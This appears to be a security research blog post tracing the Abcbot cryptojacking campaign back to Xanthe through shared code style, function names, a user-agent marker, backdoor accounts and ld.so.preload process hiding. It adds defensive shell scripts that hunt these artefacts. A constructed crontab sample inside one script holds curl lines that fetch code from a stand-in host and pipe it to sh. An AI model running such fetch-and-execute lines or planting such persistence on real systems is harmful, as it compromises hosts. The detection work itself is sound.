Abcbot – An Evolution of Xanthe

There are a few infrastructure overlaps. For example, a rule allowing ingress traffic from 64[.]225[.]46[.]44 appears in both the Xanthe sample and the Abcbot sample.
Whilst it’s common to see cryptojacking malware authors simply copy code from each other, there are a number of other similarities discussed below which make a direct link in ownership between the Xanthe and Abcbot campaigns more likely.

In the original report from Cisco’s Talos security research team, researchers commented on the coding style of the shell scripts being analysed – in particular, functions being declared at the top of the file and then invoked in some of the later lines.
Talos researchers suggested that this likely aids testing of new iterations, since functionality can be enabled or disabled simply by commenting out the lines that invoke a function.
Both the Abcbot and Xanthe samples we compared follow this coding style.

Linking these two samples based on code style similarities alone would be tenuous, at best. However, if we look at some of the function names themselves, correlation becomes apparent.
Several of the functions have “go” appended to the end of the function name and some functions have identical names. The following names appear in both samples:

nameservercheck
croncheckgo
checkrc
iptableschecker
filerungo

Comparing the two implementations of nameservercheck, the Abcbot version is significantly larger than its Xanthe counterpart.
The Xanthe sample we analyzed is over a year older than the Abcbot sample (going by VirusTotal submission dates).
This could indicate that the function has been iterated on several times since, with new functionality added at each iteration.

The croncheckgo function in both samples is responsible for achieving persistence via cron, the scheduling utility common to most Linux distributions.
Both samples include a TODO comment from the author noting that logic to determine whether cron is running on different Linux distributions still needs to be added.
The service command is then used to start cron, so that any entries written to the crontab are actually honoured by the scheduler.
The cron entries consist of curl commands with explicitly set user-agent strings.
The purpose of this is covered in Talos' research, but looking at the strings themselves, fczyo-cron appears in both samples, each with a different version number appended. Incidentally, one of the payloads downloaded by Xanthe is also named "fczyo".

Reuse of a string this distinctive seems more than coincidental, and suggests that the server-side code in both the Xanthe and Abcbot campaigns expects this value in the User-Agent header of requests from its bots.
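
As an added example (not code from the original post or from either malware family), the following script hunts for the cron persistence just described: it reads crontab-format lines, keeps the curl entries, and flags those whose user-agent carries the fczyo-cron marker, printing the full user-agent (version suffix included) beside each offending line. The crontab content, the example.invalid URLs and the helper names are this example's own constructions; scan_host_crontabs runs the same check over the crontab locations of a live Debian- or Red Hat-style host.

```shell
#!/bin/sh
# Added example (not code from the original post or from either malware family):
# hunt cron persistence of the kind described above. It parses crontab-format
# lines, keeps curl entries, and flags those whose user-agent carries the
# "fczyo-cron" marker, printing the UA (with its version suffix) beside the line.
# The crontab content below is constructed for this example, not a capture.

# Extract the argument to -A / --user-agent, with or without quotes.
UA_RE="s/.*(-A|--user-agent)[[:space:]]+[\"']?([^\"' ]+).*/\\2/p"

# $1: file of crontab lines. Prints "UA<TAB>cron line" for each suspicious entry.
find_fczyo_cron() {
    grep -v '^[[:space:]]*#' "$1" | grep -- 'curl' | while IFS= read -r line; do
        ua=$(printf '%s\n' "$line" | sed -nE "$UA_RE")
        case "$ua" in
            *fczyo-cron*) printf '%s\t%s\n' "$ua" "$line" ;;
        esac
    done
    return 0
}

# Number of flagged entries in $1.
count_fczyo_cron() {
    find_fczyo_cron "$1" | wc -l | tr -d ' '
}

# Live variant: the system crontab, drop-in directory and per-user spools
# (Debian and Red Hat layouts).
scan_host_crontabs() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && find_fczyo_cron "$f"
    done
    return 0
}

CRON_SAMPLE=$(mktemp)
trap 'rm -f "$CRON_SAMPLE"' EXIT
cat > "$CRON_SAMPLE" <<'EOF'
# constructed sample crontab
*/10 * * * * root /usr/bin/apt-get update >/dev/null 2>&1
* * * * * curl -fsSL -A "fczyo-cron/1.0" http://example.invalid/x | sh
0 * * * * /usr/bin/curl --user-agent fczyo-cron/2.1 -o /tmp/.x http://example.invalid/y
0 3 * * * curl -A "Mozilla/5.0" https://example.invalid/ok
EOF

find_fczyo_cron "$CRON_SAMPLE"
```

The two flagged lines are the ones using the marker; the apt-get entry and the curl entry with a browser user-agent pass through. Matching on the marker rather than on "curl in cron" keeps the noise down, but a host where the actor has changed the string will need the broader query (any cron entry that pipes a download into sh).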

Talos researchers noted that Xanthe propagated by enumerating the ~/.ssh/known_hosts file, spreading to hosts the compromised machine had previously connected to over SSH. A known_hosts file written with HashKnownHosts yes (or converted with ssh-keygen -H) stores hashed hostnames and denies the malware that ready-made target list.

Our analysis of Abcbot found code that adds four malicious users to the compromised host, giving the actor four backdoor accounts. The usernames in question were:

logger
sysall
system
autoupdater

In the Xanthe sample, users with the same four names are added to the system (if they do not already exist).
Similarly, both Abcbot and Xanthe search for and remove users that we assume belong to competing campaigns.
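
As an added example (not code from the original post or from either malware family), a passwd-format check for these four account names, plus a general audit for extra UID 0 accounts, run against a constructed /etc/passwd excerpt. The sample accounts and the helper names are this example's own; point the functions at /etc/passwd on a live host.

```shell
#!/bin/sh
# Added example (not code from the original post or from either malware family):
# check passwd-format data for the four account names both campaigns create.
# The passwd excerpt below is constructed for this example.

SUSPECT_USERS="logger sysall system autoupdater"

# $1: passwd-format file. Prints "name:uid:shell" for each suspect account,
# in file order.
find_suspect_users() {
    while IFS=: read -r name pw uid gid gecos home shell; do
        for s in $SUSPECT_USERS; do
            if [ "$name" = "$s" ]; then
                printf '%s:%s:%s\n' "$name" "$uid" "$shell"
            fi
        done
    done < "$1"
    return 0
}

# General extra check, not specific to these campaigns: any account other than
# root with UID 0 is root-equivalent and needs an explanation.
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

PASSWD_SAMPLE=$(mktemp)
trap 'rm -f "$PASSWD_SAMPLE"' EXIT
cat > "$PASSWD_SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
system:x:1001:1001::/home/system:/bin/bash
logger:x:1002:1002::/home/logger:/bin/bash
toor:x:0:0::/root:/bin/bash
EOF

find_suspect_users "$PASSWD_SAMPLE"
find_extra_uid0 "$PASSWD_SAMPLE"
```

Names such as system and logger are generic enough that a hit alone is a lead, not proof: corroborate with the account's creation time (home directory, /etc/shadow last-change field), any sudoers entry, and authorized_keys content before calling it a backdoor.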

As researchers at Talos reported, perhaps the defining feature of Xanthe was its use of libprocesshider, an open source process-hiding library. The path to the built libprocesshider.so was written into /etc/ld.so.preload, so the dynamic loader injects it into every dynamically linked process started afterwards; the library hooks readdir() and filters the XMRig miner's /proc entry out of the results, hiding the miner from tools such as ps and top.

We did not see evidence of this process-hiding technique in the Abcbot sample we analyzed. We did, however, see references to it in the function kill_miner_proc, which is responsible for clearing the artifacts left by miners from competing or prior campaigns (such as Xanthe).
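
As an added example (not code from the original post or from either malware family), the following script audits the ld.so.preload technique described above and shows the standard way to catch readdir()-based process hiding: a hidden PID is absent from ps and from directory listings, but stat() of /proc/<pid> (which is what `[ -d ]` performs) still succeeds, so walking the PID space that way and comparing against ps exposes it. The preload file content and helper names are this example's own; the live PID walk is defined but not invoked at the top level because it is slow in pure sh on kernels with a large pid_max.

```shell
#!/bin/sh
# Added example (not code from the original post or from either malware family):
# audit the ld.so.preload technique described above and look for PIDs that
# readdir()-based tools no longer report. libprocesshider hooks readdir(3) in
# every dynamically linked process, so ps, ls /proc and shell globs miss the
# hidden PID, while stat() of /proc/<pid> (what `[ -d ]` does) still succeeds.
# The preload file below is constructed for this example.

# $1: preload file (default /etc/ld.so.preload). Prints "present|MISSING<TAB>path"
# for each library the loader would inject. Anything after # is dropped.
audit_ld_preload() {
    f="${1:-/etc/ld.so.preload}"
    [ -s "$f" ] || return 0
    sed 's/#.*//' "$f" | tr -s '[:space:]' '\n' | sed '/^$/d' | while IFS= read -r lib; do
        if [ -e "$lib" ]; then
            printf 'present\t%s\n' "$lib"
        else
            printf 'MISSING\t%s\n' "$lib"
        fi
    done
    return 0
}

preload_entry_count() {
    audit_ld_preload "$1" | wc -l | tr -d ' '
}

# Pure helper: PIDs in list $1 (found via stat) that are absent from list $2
# (reported by ps). Both are whitespace-separated.
diff_pid_lists() {
    for p in $1; do
        case " $2 " in
            *" $p "*) ;;
            *) printf '%s\n' "$p" ;;
        esac
    done
    return 0
}

# Live check. Walks the PID space with stat() rather than readdir(), then asks
# ps, and re-checks each candidate to discard processes that simply exited
# between the two snapshots. Slow in pure sh when pid_max is large (4194304 on
# many 64-bit kernels); not invoked at top level here.
find_hidden_pids() {
    max=$(cat /proc/sys/kernel/pid_max 2>/dev/null || echo 32768)
    seen=""
    p=1
    while [ "$p" -le "$max" ]; do
        [ -d "/proc/$p" ] && seen="$seen $p"
        p=$((p + 1))
    done
    listed=$(ps -e -o pid= | tr -s '[:space:]' ' ')
    for p in $(diff_pid_lists "$seen" "$listed"); do
        [ -d "/proc/$p" ] && printf 'hidden pid %s: %s\n' "$p" "$(tr '\0' ' ' < "/proc/$p/cmdline")"
    done
    return 0
}

PRELOAD_SAMPLE=$(mktemp)
trap 'rm -f "$PRELOAD_SAMPLE"' EXIT
printf '%s\n' '/usr/local/lib/libprocesshider.so  # constructed entry' > "$PRELOAD_SAMPLE"

audit_ld_preload "$PRELOAD_SAMPLE"
diff_pid_lists "1 2 3 4 5" "1 2 4 5"
```

On a clean host /etc/ld.so.preload is normally absent or empty, so any entry deserves a look, and an entry whose library is MISSING on disk is itself a sign of a partial cleanup. A non-empty file is also a reason to distrust the host's own ps, ls and find: every one of them is dynamically linked and therefore subject to the hook, which is why the PID walk above avoids directory reads entirely.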
